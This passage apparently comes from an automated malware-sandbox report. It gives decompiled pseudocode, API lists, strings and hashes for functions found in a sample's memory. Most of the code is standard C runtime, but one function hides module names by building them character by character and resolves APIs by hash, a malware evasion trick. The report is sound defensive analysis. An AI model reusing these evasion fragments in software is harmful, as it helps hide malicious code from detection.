						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x00416218
0x00416219
0x0041621a
0x0041621d
0x0041621f
0x00416222
0x00416223
0x00416225
0x00416226
0x00416227
0x0041622a
0x00416234
0x004162e5
0x004162ec
0x004162f5
0x0041623a
0x0041623a
0x00416240
0x00416246
0x00416249
0x0041624c
0x00416250
0x00416255
0x0041625a
0x004162da
0x00000000
0x0041625c
0x0041625c
0x00416268
0x0041626a
0x004162c5
0x004162c5
0x004162cb
0x00000000
0x0041626c
0x0041627b
0x0041627d
0x0041627e
0x0041627f
0x00416282
0x00416282
0x00416284
0x00000000
0x00416286
0x00416286
0x004162d0
0x00416288
0x00416288
0x0041628c
0x00416294
0x00416299
0x0041629e
0x004162aa
0x004162b2
0x004162b9
0x004162bf
0x004162c3
0x00000000
0x004162c3
0x00416286
0x00416284
0x00000000
0x0041626a
0x004162de
0x004162de
0x004162de
0x0041625a
0x004162fa
0x00416301

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cabf6022af048575c402c7c6e354eb9f8ff42dcc324ea626b3341853ec57442c
Instruction ID: 895f1c04ab03d623575f2a01b6853f6f093ada6492054dde3cdccdaf5acb8e67
Opcode Fuzzy Hash: cabf6022af048575c402c7c6e354eb9f8ff42dcc324ea626b3341853ec57442c
Instruction Fuzzy Hash: 9421B6729002049BCB10EF69C8809E7B7A5FF44360B0681ADE9599B246EB34F955C7E5

Uniqueness

Uniqueness Score: -1.00%

Function 023D0D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 8b5d128b25dd82fe0e75673c4e3ae250793a12e151fe8cc80ded3486169ddbff
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 5D01DB776106048FDF25CF34E904BAA33F5FB85B15F4544BAD506D7242E774A941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0041576F Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 115
fileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E0041576F() {
				intOrPtr _t20;
				int _t21;
				long _t24;
				void* _t31;
				void* _t51;
				long _t52;
				void* _t57;
				signed int _t67;
				void** _t69;
				void* _t70;
				void* _t72;
				void* _t73;

				_t70 = _t72 - 0x8c;
				_t73 = _t72 - 0x10c;
				_t20 =  *0x46c5a0; // 0xfb090c04
				_t52 =  *(_t70 + 0x94);
				 *((intOrPtr*)(_t70 + 0x88)) = _t20;
				_t21 = 0;
				while(_t52 !=  *((intOrPtr*)(0x46c068 + _t21 * 8))) {
					_t21 = _t21 + 1;
					if(_t21 < 0x13) {
						continue;
					}
					break;
				}
				_t67 = _t21 << 3;
				_t6 = _t67 + 0x46c068; // 0x58000000
				if(_t52 ==  *_t6) {
					_t21 =  *0x46cc68; // 0x0
					if(_t21 == 1 || _t21 == 0 &&  *0x46c048 == 1) {
						_t17 = _t67 + 0x46c06c; // 0x46a058
						_t69 = _t17;
						_t24 = E004146E0( *_t69);
						_t21 = WriteFile(GetStdHandle(0xfffffff4),  *_t69, _t24, _t70 + 0x94, 0);
					} else {
						if(_t52 != 0xfc) {
							 *((char*)(_t70 + 0x84)) = 0;
							if(GetModuleFileNameA(0, _t70 - 0x80, 0x104) == 0) {
								E004174C0(_t70 - 0x80, "<program name unknown>");
							}
							_t63 = _t70 - 0x80;
							if(E004146E0(_t70 - 0x80) + 1 > 0x3c) {
								E00417AF0(E004146E0(_t63) + _t70 - 0x45, "...", 3);
								_t73 = _t73 + 0x10;
							}
							_t31 = E004146E0(_t63);
							_t12 = _t67 + 0x46c06c; // 0x46a058
							_t14 = E004146E0( *_t12) + 0x1c; // 0x1c
							_pop(_t57);
							E00416320(_t31 + _t14 + 0x00000003 & 0xfffffffc, _t57);
							_t51 = _t73;
							E004174C0(_t51, "Runtime Error!\n\nProgram: ");
							E004174D0(_t51, _t63);
							E004174D0(_t51, "\n\n");
							_t15 = _t67 + 0x46c06c; // 0x46a058
							E004174D0(_t51,  *_t15);
							_push(0x12010);
							_push("Microsoft Visual C++ Runtime Library");
							_push(_t51);
							_t21 = E004179F7();
						}
					}
				}
				return E00417786(_t21,  *((intOrPtr*)(_t70 + 0x88)));
			}

0x00415770
0x00415777
0x0041577d
0x00415782
0x0041578a
0x00415793
0x00415795
0x0041579e
0x004157a2
0x00000000
0x00000000
0x00000000
0x004157a2
0x004157a6
0x004157a9
0x004157af
0x004157b5
0x004157bd
0x004158aa
0x004158aa
0x004158b2
0x004158c4
0x004157d4
0x004157da
0x004157ea
0x004157f8
0x00415803
0x00415809
0x0041580a
0x0041581a
0x00415836
0x0041583b
0x0041583b
0x0041583f
0x00415844
0x00415851
0x00415859
0x0041585d
0x00415862
0x0041586a
0x00415871
0x0041587c
0x00415881
0x00415888
0x0041588d
0x00415892
0x00415897
0x00415898
0x0041589d
0x004157da
0x004157bd
0x004158e5

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 004157F0
_strcat.LIBCMT ref: 00415803
_strlen.LIBCMT ref: 00415810
_strlen.LIBCMT ref: 0041581F
_strncpy.LIBCMT ref: 00415836
_strlen.LIBCMT ref: 0041583F
_strlen.LIBCMT ref: 0041584C
_strcat.LIBCMT ref: 0041586A
_strlen.LIBCMT ref: 004158B2
GetStdHandle.KERNEL32(000000F4,0046A058,00000000,?,00000000,00000000,00000000,00000000), ref: 004158BD
WriteFile.KERNEL32(00000000), ref: 004158C4

Strings

Runtime Error!Program: , xrefs: 00415864
Microsoft Visual C++ Runtime Library, xrefs: 00415892
<program name unknown>, xrefs: 004157FD
..., xrefs: 00415830

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$File_strcat$HandleModuleNameWrite_strncpy
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3601721357-4022980321
Opcode ID: 7b9b734a8570efa4c82bdfa1ba3118aecf44dc6e603c82e156e28764ab64a522
Instruction ID: 577b7bbf085b9b71fba9bd98709114dee92f9acafe4a683e4f827629c86dcfc5
Opcode Fuzzy Hash: 7b9b734a8570efa4c82bdfa1ba3118aecf44dc6e603c82e156e28764ab64a522
Instruction Fuzzy Hash: 8F310972600214EADB20BF75DC86EEE7768EF81318F10451BF456E3192EA7C95D8872D

Uniqueness

Uniqueness Score: -1.00%

Function 00419FD3 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00419FD3(long __ebx, void* __edi, intOrPtr __esi, void* __eflags) {
				long _t46;
				intOrPtr* _t47;
				long _t51;
				void* _t53;
				void* _t55;
				long _t71;
				long _t72;
				long _t74;
				long _t77;
				long _t79;
				long _t82;
				long _t83;
				long _t85;
				long _t87;
				void* _t91;
				void* _t103;
				char* _t116;
				void* _t117;
				void* _t119;
				long _t120;
				void* _t126;
				intOrPtr _t127;

				_t118 = __esi;
				_t115 = __edi;
				_t98 = __ebx;
				_push(0x118);
				_push(0x46abd8);
				E004161C8(__ebx, __edi, __esi);
				_t46 =  *0x46c5a0; // 0xfb090c04
				 *(_t126 - 0x1c) = _t46;
				_t47 =  *0x46d020; // 0x0
				if(_t47 == 0) {
					__eflags =  *(_t126 + 8) == 1;
					if( *(_t126 + 8) == 1) {
						_t116 = "Buffer overrun detected!";
						 *(_t126 - 0x128) = "A buffer overrun has been detected which has corrupted the program\'s\ninternal state.  The program cannot safely continue execution and must\nnow be terminated.\n";
						_t119 = 0xb9;
					} else {
						_t116 = "Unknown security failure detected!";
						 *(_t126 - 0x128) = "A security error of unknown cause has been detected which has\ncorrupted the program\'s internal state.  The program cannot safely\ncontinue execution and must now be terminated.\n";
						_t119 = 0xd4;
					}
					 *(_t126 - 0x20) = 0;
					_t51 = GetModuleFileNameA(0, _t126 - 0x124, 0x104);
					__eflags = _t51;
					if(_t51 == 0) {
						E004174C0(_t126 - 0x124, "<program name unknown>");
					}
					_t98 = _t126 - 0x124;
					_t53 = E004146E0(_t126 - 0x124);
					__eflags = _t53 + 0xb - 0x3c;
					if(_t53 + 0xb > 0x3c) {
						_t91 = E004146E0(_t98);
						_t98 = _t91 + _t126 - 0xf3;
						__eflags = _t91 + _t126 - 0xf3;
						E00417AF0(_t91 + _t126 - 0xf3, "...", 3);
						_t127 = _t127 + 0x10;
					}
					_t55 = E004146E0(_t98);
					_pop(_t103);
					__eflags = _t55 + _t119 + 0x0000000c + 0x00000003 & 0xfffffffc;
					E00416320(_t55 + _t119 + 0x0000000c + 0x00000003 & 0xfffffffc, _t103);
					 *((intOrPtr*)(_t126 - 0x18)) = _t127;
					_t118 = _t127;
					E004174C0(_t118, _t116);
					_t115 = "\n\n";
					E004174D0(_t118, "\n\n");
					E004174D0(_t118, "Program: ");
					E004174D0(_t118, _t98);
					E004174D0(_t118, "\n\n");
					E004174D0(_t118,  *(_t126 - 0x128));
					_push(0x12010);
					_push("Microsoft Visual C++ Runtime Library");
					_push(_t118);
					E004179F7();
					_t127 = _t127 + 0x3c;
					goto L11;
				} else {
					 *(_t126 - 4) = 0;
					 *_t47( *(_t126 + 8),  *(_t126 + 0xc));
					 *(_t126 - 4) =  *(_t126 - 4) | 0xffffffff;
					L11:
					E00415740(3);
					asm("int3");
					_push(0x14);
					_push(0x46abe8);
					E004161C8(_t98, _t115, _t118);
					_t117 =  *(_t126 + 8);
					if(_t117 != 0) {
						_t120 =  *(_t126 + 0xc);
						__eflags = _t120;
						if(__eflags != 0) {
							__eflags =  *0x46d364 - 3;
							if( *0x46d364 != 3) {
								while(1) {
									_t69 = 0;
									__eflags = _t120 - 0xffffffe0;
									if(_t120 <= 0xffffffe0) {
										__eflags = _t120;
										if(_t120 == 0) {
											_t120 = 1;
											__eflags = 1;
										}
										_t69 = HeapReAlloc( *0x46d360, 0, _t117, _t120);
									}
									__eflags = _t69;
									if(_t69 != 0) {
										goto L49;
									}
									__eflags =  *0x46cfa0; // 0x0
									if(__eflags == 0) {
										goto L49;
									}
									_t71 = E00418BF0(_t120);
									__eflags = _t71;
									if(_t71 != 0) {
										continue;
									}
									L48:
									_t69 = 0;
									__eflags = 0;
									goto L49;
								}
								goto L49;
							} else {
								goto L17;
							}
							while(1) {
								L17:
								 *(_t126 - 0x1c) = 0;
								__eflags = _t120 - 0xffffffe0;
								if(_t120 <= 0xffffffe0) {
									E004164B0(0, _t117, 4);
									 *(_t126 - 4) = 0;
									_t74 = E00417DF4(_t117);
									 *(_t126 - 0x20) = _t74;
									__eflags = _t74;
									if(_t74 != 0) {
										__eflags = _t120 -  *0x46d11c; // 0x0
										if(__eflags <= 0) {
											_push(_t120);
											_push(_t117);
											_push(_t74);
											_t82 = E004182F4();
											_t127 = _t127 + 0xc;
											__eflags = _t82;
											if(_t82 == 0) {
												_push(_t120);
												_t83 = E004185D3();
												 *(_t126 - 0x1c) = _t83;
												__eflags = _t83;
												if(_t83 != 0) {
													_t85 =  *((intOrPtr*)(_t117 - 4)) - 1;
													 *(_t126 - 0x24) = _t85;
													__eflags = _t85 - _t120;
													if(_t85 >= _t120) {
														_t85 = _t120;
													}
													E004143A0( *(_t126 - 0x1c), _t117, _t85);
													_t87 = E00417DF4(_t117);
													 *(_t126 - 0x20) = _t87;
													_push(_t117);
													_push(_t87);
													E00417E1F();
													_t127 = _t127 + 0x18;
												}
											} else {
												 *(_t126 - 0x1c) = _t117;
											}
										}
										__eflags =  *(_t126 - 0x1c);
										if( *(_t126 - 0x1c) == 0) {
											__eflags = _t120;
											if(_t120 == 0) {
												_t120 = 1;
												__eflags = 1;
												 *(_t126 + 0xc) = 1;
											}
											_t120 = _t120 + 0x0000000f & 0xfffffff0;
											 *(_t126 + 0xc) = _t120;
											_t77 = HeapAlloc( *0x46d360, 0, _t120);
											 *(_t126 - 0x1c) = _t77;
											__eflags = _t77;
											if(_t77 != 0) {
												_t79 =  *((intOrPtr*)(_t117 - 4)) - 1;
												 *(_t126 - 0x24) = _t79;
												__eflags = _t79 - _t120;
												if(_t79 >= _t120) {
													_t79 = _t120;
												}
												E004143A0( *(_t126 - 0x1c), _t117, _t79);
												_push(_t117);
												_push( *(_t126 - 0x20));
												E00417E1F();
												_t127 = _t127 + 0x14;
											}
										}
									}
									 *(_t126 - 4) =  *(_t126 - 4) | 0xffffffff;
									E0041A283();
									__eflags =  *(_t126 - 0x20);
									if( *(_t126 - 0x20) == 0) {
										__eflags = _t120;
										if(_t120 == 0) {
											_t120 = 1;
											__eflags = 1;
										}
										_t120 = _t120 + 0x0000000f & 0xfffffff0;
										__eflags = _t120;
										 *(_t126 + 0xc) = _t120;
										 *(_t126 - 0x1c) = HeapReAlloc( *0x46d360, 0, _t117, _t120);
									}
								}
								_t69 =  *(_t126 - 0x1c);
								__eflags =  *(_t126 - 0x1c);
								if( *(_t126 - 0x1c) != 0) {
									goto L49;
								}
								__eflags =  *0x46cfa0; // 0x0
								if(__eflags == 0) {
									goto L49;
								}
								_t72 = E00418BF0(_t120);
								__eflags = _t72;
								if(_t72 != 0) {
									continue;
								}
								goto L48;
							}
							goto L49;
						}
						_push(_t117);
						E00416C4A(0, _t117, _t120, __eflags);
						goto L48;
					} else {
						_t69 = E00417CFF( *(_t126 + 0xc));
						L49:
						return E00416203(_t69);
					}
				}
			}

0x00419fd3
0x00419fd3
0x00419fd3
0x00419fd3
0x00419fd8
0x00419fdd
0x00419fe2
0x00419fe7
0x00419fea
0x00419ff3
0x0041a017
0x0041a018
0x0041a030
0x0041a035
0x0041a03f
0x0041a01a
0x0041a01a
0x0041a01f
0x0041a029
0x0041a029
0x0041a044
0x0041a054
0x0041a05a
0x0041a05c
0x0041a06a
0x0041a070
0x0041a071
0x0041a07a
0x0041a083
0x0041a086
0x0041a08b
0x0041a09b
0x0041a09b
0x0041a0a5
0x0041a0aa
0x0041a0aa
0x0041a0ae
0x0041a0b3
0x0041a0bb
0x0041a0be
0x0041a0c3
0x0041a0c6
0x0041a0ca
0x0041a0cf
0x0041a0d6
0x0041a0e1
0x0041a0e8
0x0041a0ef
0x0041a0fb
0x0041a100
0x0041a105
0x0041a10a
0x0041a10b
0x0041a110
0x00000000
0x00419ff5
0x00419ff5
0x00419ffe
0x0041a002
0x0041a113
0x0041a115
0x0041a11a
0x0041a11b
0x0041a11d
0x0041a122
0x0041a127
0x0041a12e
0x0041a13e
0x0041a141
0x0041a143
0x0041a151
0x0041a158
0x0041a28c
0x0041a28c
0x0041a28e
0x0041a291
0x0041a293
0x0041a295
0x0041a299
0x0041a299
0x0041a299
0x0041a2a3
0x0041a2a3
0x0041a2a9
0x0041a2ab
0x00000000
0x00000000
0x0041a2ad
0x0041a2b3
0x00000000
0x00000000
0x0041a2b6
0x0041a2bc
0x0041a2be
0x00000000
0x00000000
0x0041a2c0
0x0041a2c0
0x0041a2c0
0x00000000
0x0041a2c0
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a15e
0x0041a15e
0x0041a15e
0x0041a161
0x0041a164
0x0041a16c
0x0041a172
0x0041a176
0x0041a17c
0x0041a17f
0x0041a181
0x0041a187
0x0041a18d
0x0041a18f
0x0041a190
0x0041a191
0x0041a192
0x0041a197
0x0041a19a
0x0041a19c
0x0041a1a3
0x0041a1a4
0x0041a1aa
0x0041a1ad
0x0041a1af
0x0041a1b4
0x0041a1b5
0x0041a1b8
0x0041a1ba
0x0041a1bc
0x0041a1bc
0x0041a1c3
0x0041a1c9
0x0041a1ce
0x0041a1d1
0x0041a1d2
0x0041a1d3
0x0041a1d8
0x0041a1d8
0x0041a19e
0x0041a19e
0x0041a19e
0x0041a19c
0x0041a1db
0x0041a1de
0x0041a1e0
0x0041a1e2
0x0041a1e6
0x0041a1e6
0x0041a1e7
0x0041a1e7
0x0041a1ed
0x0041a1f0
0x0041a1fb
0x0041a201
0x0041a204
0x0041a206
0x0041a20b
0x0041a20c
0x0041a20f
0x0041a211
0x0041a213
0x0041a213
0x0041a21a
0x0041a21f
0x0041a220
0x0041a223
0x0041a228
0x0041a228
0x0041a206
0x0041a1de
0x0041a22b
0x0041a22f
0x0041a234
0x0041a237
0x0041a239
0x0041a23b
0x0041a23f
0x0041a23f
0x0041a23f
0x0041a243
0x0041a243
0x0041a246
0x0041a258
0x0041a258
0x0041a237
0x0041a25b
0x0041a25e
0x0041a260
0x00000000
0x00000000
0x0041a262
0x0041a268
0x00000000
0x00000000
0x0041a26b
0x0041a271
0x0041a273
0x00000000
0x00000000
0x00000000
0x0041a279
0x00000000
0x0041a15e
0x0041a145
0x0041a146
0x00000000
0x0041a130
0x0041a133
0x0041a2c2
0x0041a2c7
0x0041a2c7
0x0041a12e

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,0046ABD8,00000118,0041776E,00000001,00000000,0046A2D8,00000008,004158DB,00000000,00000000,00000000), ref: 0041A054
_strcat.LIBCMT ref: 0041A06A
_strlen.LIBCMT ref: 0041A07A
_strlen.LIBCMT ref: 0041A08B
_strncpy.LIBCMT ref: 0041A0A5
_strlen.LIBCMT ref: 0041A0AE
_strcat.LIBCMT ref: 0041A0CA

Strings

A buffer overrun has been detected which has corrupted the program'sinternal state. The program cannot safely continue execution and mustnow be terminated., xrefs: 0041A035
Microsoft Visual C++ Runtime Library, xrefs: 0041A105
Program: , xrefs: 0041A0DB
<program name unknown>, xrefs: 0041A05E
Unknown security failure detected!, xrefs: 0041A01A
Buffer overrun detected!, xrefs: 0041A030, 0041A0C8
..., xrefs: 0041A09F
A security error of unknown cause has been detected which hascorrupted the program's internal state. The program cannot safelycontinue execution and must now be terminated., xrefs: 0041A01F

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$_strcat$FileModuleName_strncpy
String ID: ...$<program name unknown>$A buffer overrun has been detected which has corrupted the program'sinternal state. The program cannot safely continue execution and mustnow be terminated.$A security error of unknown cause has been detected which hascorrupted the program's internal state. The program cannot safelycontinue execution and must now be terminated.$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
API String ID: 3058806289-1010210193
Opcode ID: 66ef0446d342e59961b719c7db9cf8a354fb8283c97a3809e9921355d604477b
Instruction ID: bb41d93a244b4089e7877c9e524f2991002334136ba191439c3978bcb68cb89c
Opcode Fuzzy Hash: 66ef0446d342e59961b719c7db9cf8a354fb8283c97a3809e9921355d604477b
Instruction Fuzzy Hash: 3131F471A016147BCB10AF61CC42FCE3A689F05358F10805BF115B7292EB7C9AA58B9F

Uniqueness

Uniqueness Score: -1.00%

Function 00401DFD Relevance: 24.6, APIs: 2, Strings: 12, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00401DFD(intOrPtr* _a4) {
				signed short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				signed short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				short _v48;
				short _v50;
				char _v52;
				intOrPtr* _t44;
				short _t45;
				struct HINSTANCE__* _t47;
				struct HINSTANCE__* _t49;
				intOrPtr _t50;
				intOrPtr* _t51;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t61;

				_t44 = _a4;
				_t61 =  *_t44;
				if(_t61 != 0) {
					_v6 = _v6 & 0x00000000;
					_v28 = _v28 & 0x00000000;
					_t45 = 0x6c;
					_v18 = _t45;
					_v16 = _t45;
					_v10 = _t45;
					_v8 = _t45;
					_v42 = _t45;
					_v32 = _t45;
					_v30 = _t45;
					_v24 = 0x6e;
					_v22 = 0x74;
					_v20 = 0x64;
					_v14 = 0x2e;
					_v12 = 0x64;
					_v52 = 0x6b;
					_v50 = 0x65;
					_v48 = 0x72;
					_v46 = 0x6e;
					_v44 = 0x65;
					_v40 = 0x33;
					_v38 = 0x32;
					_v36 = 0x2e;
					_v34 = 0x64;
					_t47 = GetModuleHandleW( &_v24);
					if(_t47 != 0) {
						 *(_t61 + 0x1c) = _t47;
					}
					_t29 =  &_v52; // 0x6b
					_t49 = GetModuleHandleW(_t29);
					if(_t49 != 0) {
						 *(_t61 + 0x20) = _t49;
					}
					_push(0x8c394d89);
					_t59 = _t61 + 0xa0;
					_t50 = E0040358D(_t49, _t61 + 0xa0, 0);
					 *((intOrPtr*)(_t61 + 0x48)) = _t50;
					if(_t50 == 0) {
						 *((intOrPtr*)(_t61 + 8)) = E00401584;
						 *((intOrPtr*)(_t61 + 0xc)) = 0x7d0;
					} else {
						_push(0x7dcf03d6);
						 *((intOrPtr*)(_t61 + 0x4c)) = E0040358D(_t50, _t59, 0);
						 *((intOrPtr*)(_t61 + 8)) = E00401D93;
						 *((intOrPtr*)(_t61 + 0xc)) = 0x258;
					}
					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_t61 + 4)) + 4));
					_t51 = _t61 + 0x10;
					 *_t51 = _t54;
					 *((intOrPtr*)(_t54 + 4)) = _t51;
					_t56 =  *((intOrPtr*)(_t61 + 4)) + 4;
					 *((intOrPtr*)(_t61 + 0x14)) = _t56;
					 *_t56 = _t51;
					return _t51;
				}
				return _t44;
			}

0x00401e03
0x00401e07
0x00401e0b
0x00401e11
0x00401e16
0x00401e24
0x00401e25
0x00401e29
0x00401e2d
0x00401e31
0x00401e35
0x00401e39
0x00401e3d
0x00401e45
0x00401e4b
0x00401e51
0x00401e57
0x00401e5d
0x00401e63
0x00401e69
0x00401e6f
0x00401e75
0x00401e7b
0x00401e81
0x00401e87
0x00401e8d
0x00401e93
0x00401e99
0x00401e9d
0x00401e9f
0x00401e9f
0x00401ea2
0x00401ea6
0x00401eaa
0x00401eac
0x00401eac
0x00401eaf
0x00401eb4
0x00401ebd
0x00401ec7
0x00401eca
0x00401eef
0x00401ef6
0x00401ecc
0x00401ecc
0x00401edc
0x00401edf
0x00401ee6
0x00401ee6
0x00401f00
0x00401f03
0x00401f06
0x00401f08
0x00401f0e
0x00401f11
0x00401f14
0x00000000
0x00401f16
0x00401f19

APIs

GetModuleHandleW.KERNEL32(?), ref: 00401E99
GetModuleHandleW.KERNEL32(kre3.), ref: 00401EA6

Strings

d, xrefs: 00401E51
., xrefs: 00401E57
d, xrefs: 00401E93
n, xrefs: 00401E75
n, xrefs: 00401E45
3, xrefs: 00401E81
e, xrefs: 00401E7B
2, xrefs: 00401E87
., xrefs: 00401E8D
d, xrefs: 00401E5D
kre3., xrefs: 00401EA2, 00401EA5
t, xrefs: 00401E4B

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: HandleModule
String ID: .$.$2$3$d$d$d$e$kre3.$n$n$t
API String ID: 4139908857-2775080275
Opcode ID: e28b8b627a5b3c2624ea17a78553eeaf7953413f7844f70886a94aa0716b9001
Instruction ID: f32ade02bee9fb17da141103b4b483ef0b643dabfbca228a3b12723703e9fc4b
Opcode Fuzzy Hash: e28b8b627a5b3c2624ea17a78553eeaf7953413f7844f70886a94aa0716b9001
Instruction Fuzzy Hash: 3E314B75D20309DACB20CF95C84469EB7F5BF44708F10952ED945BB360E3B5A609CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 023D2762 Relevance: 24.3, APIs: 16, Instructions: 320memoryregistryfileCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 023D279E
ReleaseDC.USER32(00000000,00000000), ref: 023D27C2
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00001000,00000000,00000000), ref: 023D28EA
_strlen.LIBCMT ref: 023D2952
OutputDebugStringW.KERNEL32(?), ref: 023D297A
HeapFree.KERNEL32(?,00000000,?), ref: 023D299C
_rand.LIBCMT ref: 023D29AA
_rand.LIBCMT ref: 023D29C3
RtlAllocateHeap.NTDLL(?,00000008,?), ref: 023D2A1D
RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 023D2A50
RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,?,00000000,?), ref: 023D2A71
RegCloseKey.ADVAPI32(00000000), ref: 023D2A85
CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000000,00000000), ref: 023D2AB6
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 023D2ACE
CloseHandle.KERNEL32(00000000), ref: 023D2AD8
HeapFree.KERNEL32(?,00000000,00000000), ref: 023D2AED

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID: Heap$CloseFileFree_rand$AllocateByteCharCreateDebugHandleMultiOpenOutputQueryReadReleaseStringValueWide_strlen
String ID:
API String ID: 4096549380-0
Opcode ID: 495ad4b6987c1d3c9336f78af48cd3cc11bc937efd0cfa91e00c3e934df74cb0
Instruction ID: 3388bc2d9b00620cd57581fdadb39ed07d18ceb7e985fd812757a4901d08983a
Opcode Fuzzy Hash: 495ad4b6987c1d3c9336f78af48cd3cc11bc937efd0cfa91e00c3e934df74cb0
Instruction Fuzzy Hash: 8CC189726003899FEB308F61EC84BAA77B9FF48304F244429FD66862A2DB75E455CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00414F69 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 71
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00414F69() {
				void* __edi;
				void* __esi;
				intOrPtr _t7;
				struct HINSTANCE__* _t9;
				struct HINSTANCE__* _t11;
				long _t12;
				_Unknown_base(*)()* _t16;
				void* _t22;
				struct HINSTANCE__* _t26;
				void* _t30;
				struct HINSTANCE__* _t32;

				if(E0041635D() != 0) {
					_push(_t30);
					_t26 = GetModuleHandleA("kernel32.dll");
					__eflags = _t26;
					if(_t26 != 0) {
						_t30 = GetProcAddress;
						 *0x46cc6c = GetProcAddress(_t26, "FlsAlloc");
						 *0x46cc70 = GetProcAddress(_t26, "FlsGetValue");
						 *0x46cc74 = GetProcAddress(_t26, "FlsSetValue");
						_t16 = GetProcAddress(_t26, "FlsFree");
						__eflags =  *0x46cc70;
						 *0x46cc78 = _t16;
						if( *0x46cc70 == 0) {
							 *0x46cc70 = TlsGetValue;
							 *0x46cc74 = TlsSetValue;
							 *0x46cc6c = E00414D8B;
							 *0x46cc78 = TlsFree;
						}
					}
					_t7 =  *0x46cc6c(E00414E22);
					__eflags = _t7 - 0xffffffff;
					 *0x46c04c = _t7;
					if(__eflags == 0) {
						L9:
						E00414D94();
						_t9 = 0;
						__eflags = 0;
					} else {
						_push(0x8c);
						_push(1);
						_t32 = E004164E1(_t22, 1, _t30, __eflags);
						__eflags = _t32;
						if(_t32 == 0) {
							goto L9;
						} else {
							_t11 =  *0x46cc74( *0x46c04c, _t32);
							__eflags = _t11;
							if(_t11 == 0) {
								goto L9;
							} else {
								 *((intOrPtr*)(_t32 + 0x54)) = 0x46c100;
								 *((intOrPtr*)(_t32 + 0x14)) = 1;
								_t12 = GetCurrentThreadId();
								 *(_t32 + 4) =  *(_t32 + 4) | 0xffffffff;
								 *_t32 = _t12;
								_t9 = 1;
							}
						}
					}
					return _t9;
				} else {
					E00414D94();
					return 0;
				}
			}

0x00414f70
0x00414f7a
0x00414f87
0x00414f89
0x00414f8b
0x00414f8d
0x00414fa1
0x00414fae
0x00414fbb
0x00414fc0
0x00414fc2
0x00414fc9
0x00414fce
0x00414fd5
0x00414fdf
0x00414fe9
0x00414ff3
0x00414ff3
0x00414fce
0x00414ffd
0x00415003
0x00415006
0x0041500b
0x0041504e
0x0041504e
0x00415053
0x00415053
0x0041500d
0x0041500f
0x00415015
0x0041501b
0x0041501d
0x00415021
0x00000000
0x00415023
0x0041502a
0x00415030
0x00415032
0x00000000
0x00415034
0x00415034
0x0041503b
0x0041503e
0x00415044
0x00415048
0x0041504a
0x0041504a
0x00415032
0x00415021
0x00415057
0x00414f72
0x00414f72
0x00414f79
0x00414f79

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,74CB4DE0,00000000,00414C96,?,00469BF8,00000060), ref: 00414F81
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00414F99
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00414FA6
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00414FB3
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00414FC0
FlsAlloc.KERNEL32(00414E22,?,00469BF8,00000060), ref: 00414FFD
FlsSetValue.KERNEL32(00000000,?,00469BF8,00000060), ref: 0041502A
GetCurrentThreadId.KERNEL32 ref: 0041503E

Part of subcall function 00414D94: FlsFree.KERNEL32(00000007,00415053,?,00469BF8,00000060), ref: 00414D9F
Part of subcall function 00414D94: DeleteCriticalSection.KERNEL32(00000000,00000000,00000000,?,00415053,?,00469BF8,00000060), ref: 004163C1
Part of subcall function 00414D94: DeleteCriticalSection.KERNEL32(00000007,00000000,?,00415053,?,00469BF8,00000060), ref: 004163EB

Strings

kernel32.dll, xrefs: 00414F7C
FlsAlloc, xrefs: 00414F93
FlsSetValue, xrefs: 00414FA8
